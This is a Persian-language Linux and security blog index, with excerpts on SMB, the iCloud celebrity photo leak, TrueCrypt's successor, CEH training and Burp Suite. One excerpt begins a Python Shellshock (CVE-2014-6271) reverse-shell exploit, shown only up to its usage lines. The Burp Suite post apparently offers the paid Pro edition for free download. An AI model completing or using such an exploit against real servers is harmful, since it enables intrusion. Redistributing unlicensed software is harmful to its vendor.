Google+

آموزش لینوکس و امنیت

مرجع آموزش لینوکس و امنیت پارسی

آموزش لینوکس و امنیت

مرجع آموزش لینوکس و امنیت پارسی

لطفا جهت دانلود بر روی لینک ها "کلیک کنید" و یا از گزینه "save link as" استفاده نمایید

   twitter

یه روز یکی بهم گفت چی میخونی منم بهش گفتم لینوکس و اون گفت منم لینوکس کار کردم چیزی نداره!! منم با اینکه میدونستم قدرت لینوکس تو دستوراتشه اما نمی ودونستم چی بهش بگم، هیچی نگفتم میشه بهم بگید در اینجور مواقع باید چی بگم؟
من : لبخند بزن ;)

  • حجت طاهری


مجله سلام دنیا شماره ۱ منتشر شد . از پدید آورندگانش تشکر میکنم. بخوانید و لذت ببرید ;)
  • حجت طاهری


یه وقتایی توی زندگی هست که خسته میشی نا امید میشی تنها میشی دلت میشکنه..

حوصله هیچ کس و هیچ چیز رو نداری.. حتی حوصله خودتو!

اون وقته که یه لیوان قهوه تلخ میچسبه.. یه هوای بارونی میچسبه.. یه موسیقی لایت.. (یه نخ سیگار ;)

همه این کارا رو بکن و بعدش به زندگی بگو :‌ "من عالیم.. من میتونم.. من بهترینم"

یه یا علی بگو و دوباره شروع کن.. با امید به آینده.. با امید به قدرت درونت.. با توکل به خدا

و قوانین رو به یاد داشته باش :

اعتقاد به خدا - عشق به خانواده - عشق به وطن - امید به آینده - تلاش و کوشش

پندار نیک گفتار نیک کردار نیک

یا علی..

  • حجت طاهری
    #
    #CVE-2014-6271 cgi-bin reverse shell
    #
     
    import httplib,urllib,sys
     
    if (len(sys.argv)<4):
            print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
            print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
            exit(0)
     
  • حجت طاهری


SMB یا Server Message Block پروتکلی جهت به اشتراک گذاری فایل ها، چاپگرها و پورتهای سریال است. از این پروتکل می توان بر روی پروتکل TCP/IP یا بر روی دیگر پروتکل های شبکه استفاده کرد. با استفاده از پروتکل SMB یک برنامه کاربردی (یا کاربر یک برنامه کاربردی) می تواند به فایل های یک سرور راه دور و دیگر منابع آن از جمله چاپگر دسترسی داشته باشد. به عبارت دیگر یک برنامه کاربردی می تواند فایل هایی را روی سرور راه دور بخواند، ایجاد کند و یا بروزرسانی کند. هم چنین می تواند با هر برنامه ی سرور که برای دریافت درخواست های کلاینت SMB راه اندازی شده است ارتباط برقرار کند. در حقیقت می توان گفت SMB یک پروتکل درخواست-پاسخ است که با استفاده از آن کلاینت درخواست SMB را به سمت سرور می فرستد و سرور نیز در جواب پاسخی از نوع SMB به کلاینت باز می گرداند.

  • حجت طاهری

privacy

در یک حمله‌ی هکری که تصور می‌شود بزرگ‌ترین رسوایی تاریخ هک باشد، تصاویر برهنه و ویدئوهای روابط جنسی شماری از مشهورترین چهره‌های دنیای مُد و سینما به بیرون درز کرده است.

از بعدازظهر روز یکشنبه (۳۱ آگست-۹ شهریور)، یک هکر ناشناس با انتشار تدریجی تصاویر برهنه‌ی بازیگر زن برنده‌ی اسکار، جنیفر لورنس، و چهره‌های دیگری چون کیت آپتن، کیلی کوکو، ویکتوریا جاستیس، لی میشل، کرستن دانست، بری لارسن، ترسا پالمر، مری الیزابت ونستید، و ده‌‌ها مدل، خواننده، و بازیگر دیگر، فضای شبکه‌های اجتماعی و وب‌سایت‌های خبری را تحت تاثیر خود قرار داد.

گفته شده که این تصاویر از طریق حفره‌ای در برنامه‌ی ذخیره‌ی مجازی “آی-کلود” گوشی‌ اپل به بیرون درز کرده است.

  • حجت طاهری
  • حجت طاهری

با بسته شدن پروژه truecrypt که ظاهرا بر اثر فشار های دولت ایالات متحده بوده و چندین پرونده FBI را از رسیدن به سرانجام به دلیل رمز نگاری قدرتمند خود ناموفق گذاشته بود گروهی از افراد داوطلب با تشکیل گروهی برای توسعه کدها و برنامه truecrypt دست به دست هم داده اند تا این نرم افزار عالی و قدرتمند را ادامه داده و به حریم خصوصی افراد کمک کنند. نام این پروژه TCnext بوده و در آدرس زیر قابل دریافت میباشد. 

  • حجت طاهری

یکی از پادشاهان دوره های دور کشورمان در شکارگاهی به شب بر خورد و ناگزیر در کناره ی یک آسیاب رحل اقامت گزید بی هیچ سر پناهی. آسیابان پیر در آمد که: من گوشهایم سنگین است و اگر بخواب روم صدایی نمی شنوم. و گفت: به شما توصیه می کنم به داخل آسیاب بیایید تا از باران تندی که خواهد بارید خیس نشوید. پادشاه، وزیر همراهش را خواست و سخن آسیابان با وی در میان نهاد. وزیر به آسمان نظر افکند و غش غش خندید که: این آسمان هرچه داشته باشد باران نخواهد داشت...

  • حجت طاهری


در ادامه آموزش های CEH مشغول آماده سازی قسمت عملی بخش سوم هستیم که از این مجموعه در بخش نخست با ابزار های پیدا نمودن سیستم های live در شبکه آشنا میشوید. ابزار های مورد استفاده در این آموزش از کالی لینوکس انتخاب شده تا علاوه بر رایگان بودن آشنایی با سیستم عامل مورد استفاده نفوذگران نیز آموزش داده شود. پیش از هر چیز ابخاطر کاستی های این آموزش از شما پوزش میطلبم و امیدوارم این آموزش ها شروع خوبی برای آموختن دانش عملی امنیت برای شما باشد.

  • حجت طاهری

برنامه BurpSuite ‫ یک چهارچوب مجتمع و ساده برای ارزیابی برنامه های کاربردی تحت وب است که شامل‬چندین ابزار می باشد که به صورت یکپارچه با هم در تعامل هستند و به شما اجازه می دهند تمامی مولفه ها و جنبه‌های ‫یک برنامه کاربردی تحت وب مدرن را مورد بررسی و تجزیه و تحلیل قرار بدهید. این برنامه ‫مانند یک چاقوی همه‬ ‫کاره سوئیسی برای تحلیلگران امنیتی برنامه های تحت وب است. ‫این برنامه نه تنها به شما اجازه می دهد برنامه های تحت وب را به صورت عمیق مورد تحلیل و تجزیه قرار بدهید، بلکه ‫حتی به شما اجازه می دهد روش های جمع آوری اطلاعات خودکار و تجزیه تحلیل منابع از برنامه تحت وب هدفتان را ‫مورد استفاده قرار بدهید. همچنین شایان ذکر است، این برنامه‬ توسط شرکت‬ PortSwigger ‫طراحی شده و در ‫دو نسخه رایگان و حرفه ای انتشار داده شده است.‬ نسخه حرفه ای این برنامه شامل پویشگر خودکار برنامه های تحت وب و چندین ویژگی دیگر می شود، که در این پست نسخه حرفه‌ای آن برای دانلود قرار داده شده است و در کنار آن نیز راهنمای مقدماتی این نرم‌افزار که توسط دوست خوبم آقای میلاد کهساری آماده شده است تقدیم شما میگردد.

  • حجت طاهری